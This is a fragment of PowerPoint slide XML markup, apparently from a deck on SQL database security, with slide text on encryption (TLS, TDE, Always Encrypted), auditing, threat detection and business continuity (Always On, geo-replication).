                <a:gd name="T12" fmla="*/ 179 w 530"/>
                <a:gd name="T13" fmla="*/ 1297 h 1297"/>
                <a:gd name="T14" fmla="*/ 352 w 530"/>
                <a:gd name="T15" fmla="*/ 1297 h 1297"/>
                <a:gd name="T16" fmla="*/ 439 w 530"/>
                <a:gd name="T17" fmla="*/ 1206 h 1297"/>
                <a:gd name="T18" fmla="*/ 439 w 530"/>
                <a:gd name="T19" fmla="*/ 913 h 1297"/>
                <a:gd name="T20" fmla="*/ 530 w 530"/>
                <a:gd name="T21" fmla="*/ 822 h 1297"/>
                <a:gd name="T22" fmla="*/ 530 w 530"/>
                <a:gd name="T23" fmla="*/ 409 h 1297"/>
                <a:gd name="T24" fmla="*/ 439 w 530"/>
                <a:gd name="T25" fmla="*/ 318 h 1297"/>
                <a:gd name="T26" fmla="*/ 409 w 530"/>
                <a:gd name="T27" fmla="*/ 824 h 1297"/>
                <a:gd name="T28" fmla="*/ 121 w 530"/>
                <a:gd name="T29" fmla="*/ 824 h 1297"/>
                <a:gd name="T30" fmla="*/ 121 w 530"/>
                <a:gd name="T31" fmla="*/ 623 h 1297"/>
                <a:gd name="T32" fmla="*/ 145 w 530"/>
                <a:gd name="T33" fmla="*/ 600 h 1297"/>
                <a:gd name="T34" fmla="*/ 170 w 530"/>
                <a:gd name="T35" fmla="*/ 600 h 1297"/>
                <a:gd name="T36" fmla="*/ 170 w 530"/>
                <a:gd name="T37" fmla="*/ 478 h 1297"/>
                <a:gd name="T38" fmla="*/ 255 w 530"/>
                <a:gd name="T39" fmla="*/ 393 h 1297"/>
                <a:gd name="T40" fmla="*/ 275 w 530"/>
                <a:gd name="T41" fmla="*/ 393 h 1297"/>
                <a:gd name="T42" fmla="*/ 360 w 530"/>
                <a:gd name="T43" fmla="*/ 478 h 1297"/>
                <a:gd name="T44" fmla="*/ 360 w 530"/>
                <a:gd name="T45" fmla="*/ 600 h 1297"/>
                <a:gd name="T46" fmla="*/ 385 w 530"/>
                <a:gd name="T47" fmla="*/ 600 h 1297"/>
                <a:gd name="T48" fmla="*/ 409 w 530"/>
                <a:gd name="T49" fmla="*/ 623 h 1297"/>
                <a:gd name="T50" fmla="*/ 409 w 530"/>
                <a:gd name="T51" fmla="*/ 824 h 1297"/>
                <a:gd name="T52" fmla="*/ 265 w 530"/>
                <a:gd name="T53" fmla="*/ 291 h 1297"/>
                <a:gd name="T54" fmla="*/ 410 w 530"/>
                <a:gd name="T55" fmla="*/ 145 h 1297"/>
                <a:gd name="T56" fmla="*/ 265 w 530"/>
                <a:gd name="T57" fmla="*/ 0 h 1297"/>
                <a:gd name="T58" fmla="*/ 121 w 530"/>
                <a:gd name="T59" fmla="*/ 145 h 1297"/>
                <a:gd name="T60" fmla="*/ 265 w 530"/>
                <a:gd name="T61" fmla="*/ 291 h 1297"/>
                <a:gd name="T62" fmla="*/ 275 w 530"/>
                <a:gd name="T63" fmla="*/ 427 h 1297"/>
                <a:gd name="T64" fmla="*/ 255 w 530"/>
                <a:gd name="T65" fmla="*/ 427 h 1297"/>
                <a:gd name="T66" fmla="*/ 205 w 530"/>
                <a:gd name="T67" fmla="*/ 478 h 1297"/>
                <a:gd name="T68" fmla="*/ 205 w 530"/>
                <a:gd name="T69" fmla="*/ 600 h 1297"/>
                <a:gd name="T70" fmla="*/ 326 w 530"/>
                <a:gd name="T71" fmla="*/ 600 h 1297"/>
                <a:gd name="T72" fmla="*/ 326 w 530"/>
                <a:gd name="T73" fmla="*/ 478 h 1297"/>
                <a:gd name="T74" fmla="*/ 275 w 530"/>
                <a:gd name="T75" fmla="*/ 427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0" h="1297">
                  <a:moveTo>
                    <a:pt x="439" y="318"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="318"/>
                    <a:pt x="91" y="318"/>
                    <a:pt x="91" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="318"/>
                    <a:pt x="0" y="360"/>
                    <a:pt x="0" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="822"/>
                    <a:pt x="0" y="822"/>
                    <a:pt x="0" y="822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="872"/>
                    <a:pt x="42" y="913"/>
                    <a:pt x="91" y="913"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="1203"/>
                    <a:pt x="91" y="1206"/>
                    <a:pt x="91" y="1206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="1255"/>
                    <a:pt x="129" y="1297"/>
                    <a:pt x="179" y="1297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="1297"/>
                    <a:pt x="352" y="1297"/>
                    <a:pt x="352" y="1297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="1297"/>
                    <a:pt x="439" y="1255"/>
                    <a:pt x="439" y="1206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="439" y="913"/>
                    <a:pt x="439" y="913"/>
                    <a:pt x="439" y="913"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489" y="913"/>
                    <a:pt x="530" y="872"/>
                    <a:pt x="530" y="822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="530" y="409"/>
                    <a:pt x="530" y="409"/>
                    <a:pt x="530" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="530" y="360"/>
                    <a:pt x="489" y="318"/>
                    <a:pt x="439" y="318"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="409" y="824"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="824"/>
                    <a:pt x="121" y="824"/>
                    <a:pt x="121" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="623"/>
                    <a:pt x="121" y="623"/>
                    <a:pt x="121" y="623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="610"/>
                    <a:pt x="132" y="600"/>
                    <a:pt x="145" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="600"/>
                    <a:pt x="170" y="600"/>
                    <a:pt x="170" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="478"/>
                    <a:pt x="170" y="478"/>
                    <a:pt x="170" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="431"/>
                    <a:pt x="208" y="393"/>
                    <a:pt x="255" y="393"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="393"/>
                    <a:pt x="275" y="393"/>
                    <a:pt x="275" y="393"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="393"/>
                    <a:pt x="360" y="431"/>
                    <a:pt x="360" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="600"/>
                    <a:pt x="360" y="600"/>
                    <a:pt x="360" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="385" y="600"/>
                    <a:pt x="385" y="600"/>
                    <a:pt x="385" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="600"/>
                    <a:pt x="409" y="610"/>
                    <a:pt x="409" y="623"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="409" y="824"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="265" y="291"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="291"/>
                    <a:pt x="410" y="226"/>
                    <a:pt x="410" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="65"/>
                    <a:pt x="345" y="0"/>
                    <a:pt x="265" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="0"/>
                    <a:pt x="121" y="65"/>
                    <a:pt x="121" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="226"/>
                    <a:pt x="185" y="291"/>
                    <a:pt x="265" y="291"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275" y="427"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="427"/>
                    <a:pt x="255" y="427"/>
                    <a:pt x="255" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="427"/>
                    <a:pt x="205" y="450"/>
                    <a:pt x="205" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="600"/>
                    <a:pt x="205" y="600"/>
                    <a:pt x="205" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="600"/>
                    <a:pt x="326" y="600"/>
                    <a:pt x="326" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="478"/>
                    <a:pt x="326" y="478"/>
                    <a:pt x="326" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="450"/>
                    <a:pt x="303" y="427"/>
                    <a:pt x="275" y="427"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="89617" tIns="44808" rIns="89617" bIns="44808" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="896181"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prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="41" name="Straight Arrow Connector 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB743918-0E43-437E-AE78-D902F99002A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5776729" y="3594590"/>
              <a:ext cx="398000" cy="833427"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:headEnd type="triangle"/>
              <a:tailEnd type="triangle"/>
            </a:ln>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4F8B8182-3AB4-41C1-B6EC-6AF22303B669}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4536122" y="4021767"/>
              <a:ext cx="1187312" cy="45596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6181" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1175" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>ADALSQL</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1765" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="Straight Arrow Connector 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71D7F3CB-C3F6-4BFD-BC5E-E7D6CB73C5B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4291351" y="3437242"/>
              <a:ext cx="559753" cy="541186"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="Picture 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4CAE1CC-74D2-4AAB-B4BE-E658EB6DAD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1912" y="4265332"/>
              <a:ext cx="1000263" cy="1000263"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="45" name="Straight Arrow Connector 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE5EB35-5C87-46E9-AF46-2B7588CDD528}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3921704" y="4231681"/>
              <a:ext cx="630276" cy="3473"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="57150">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pic>
          <p:nvPicPr>
            <p:cNvPr id="46" name="Picture 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D235F20C-3B41-44E1-8702-5AF80B367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2093" y="3937837"/>
              <a:ext cx="1464281" cy="1517946"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="47" name="Straight Arrow Connector 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A6410EA-5160-499E-973D-6BFDEE39E0DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5926657" y="4840938"/>
              <a:ext cx="790701" cy="10347"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:headEnd type="triangle"/>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9014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400" spc="-50">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Translated to SQL technologies...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542362" y="1676601"/>
            <a:ext cx="2043139" cy="2142924"/>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745"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Protect</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="CDF4FF">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Oval 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="295649" y="2452729"/>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3</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 name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA20704-BBC2-42A7-8F95-F3D74908C3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7814115" y="1676400"/>
            <a:ext cx="4036098" cy="2143125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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TLS, TDE, Always Encrypted</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Auditing, Threat Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931578" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1778"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="30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31578" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1778"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3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Always On, Active Geo-Replication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2496441" y="1676400"/>
            <a:ext cx="5266757" cy="2143125"/>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31578" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="6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Encryption of data at rest, in motion, in use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931578" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="6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Maintain records and audits of all database activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931578" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="6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Detect data breach and respond accordingly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931578" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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Ensure business continuity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10DFC832-DEA8-481C-87E1-B27CCAF9C21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2290" y="4480359"/>
            <a:ext cx="4732032" cy="1674821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47300DBF-22B5-467D-A81D-CEC627B0F3B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440447" y="4220740"/>
            <a:ext cx="3510499" cy="2194061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C32C2FA-1DA9-45CD-B552-685A82F1F90D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8533436" y="1113565"/>
            <a:ext cx="1716429" cy="56116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Technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92D515FC-829E-4A5F-9504-258F76ACBDE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951151" y="1113565"/>
            <a:ext cx="1245915" cy="56116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Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157460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400" spc="-50">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Translated to SQL technologies...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542362" y="1676602"/>
            <a:ext cx="2043139" cy="2161415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="25000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="365656" tIns="91414" rIns="146263" bIns="91414" rtlCol="0" anchor="ctr">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kumimoji="0" lang="en-US" sz="2745" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CDF4FF">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Report</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="CDF4FF">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Oval 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="295649" y="2452729"/>
            <a:ext cx="493427" cy="493427"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="254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0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>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Segoe UI"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2353" b="1"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 name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA20704-BBC2-42A7-8F95-F3D74908C3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7814116" y="1676400"/>
            <a:ext cx="4033128" cy="2166053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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0" bIns="146201" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
